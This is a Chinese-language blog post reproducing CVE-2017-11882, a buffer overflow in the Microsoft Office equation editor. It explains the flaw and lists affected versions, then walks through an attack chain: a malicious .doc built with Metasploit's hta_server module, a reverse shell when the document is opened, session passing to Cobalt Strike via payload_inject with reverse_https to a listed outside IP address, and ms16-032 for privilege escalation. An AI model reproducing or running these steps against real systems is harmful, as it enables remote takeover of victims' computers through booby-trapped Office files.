Office RCE (CVE-2017-11882 )

  • A+
所属分类:漏洞复现
摘要

CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。

漏洞简介:

CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。

影响范围:

1
Microsoft Office  2000/2003/2007sp3/2010sp2/2013sp1/2016  

漏洞复现:

Poc

1
https://github.com/Ridter/CVE-2017-11882

Office RCE (CVE-2017-11882 )

Office RCE (CVE-2017-11882 )

联动msf反弹shell

hta 是 HTML 应用程序,大多数的 Windows 操作系统都支持 hta 文件执行,利用 mshta.exe 解析 .hta文件执行,这里的 .hta 文件可以是本地的也可以是可访问的远程主机上的。

1
use exploit/windows/misc/hta_server

Office RCE (CVE-2017-11882 )

生成exp:

Office RCE (CVE-2017-11882 )

双击exp.doc ,成功反弹shell

Office RCE (CVE-2017-11882 )

会话传递到cs

Cs开启监听器

Office RCE (CVE-2017-11882 )

Office RCE (CVE-2017-11882 )

模块选择:

windows/local/payload_inject

1
2
3
4
5
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(windows/local/payload_inject) > set lhost   cs地址
lhost => 81.70.146.55
msf6 exploit(windows/local/payload_inject) > set lport    447 cs监听端口

Office RCE (CVE-2017-11882 )

Office RCE (CVE-2017-11882 )

提权:

ms16-032

Office RCE (CVE-2017-11882 )

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: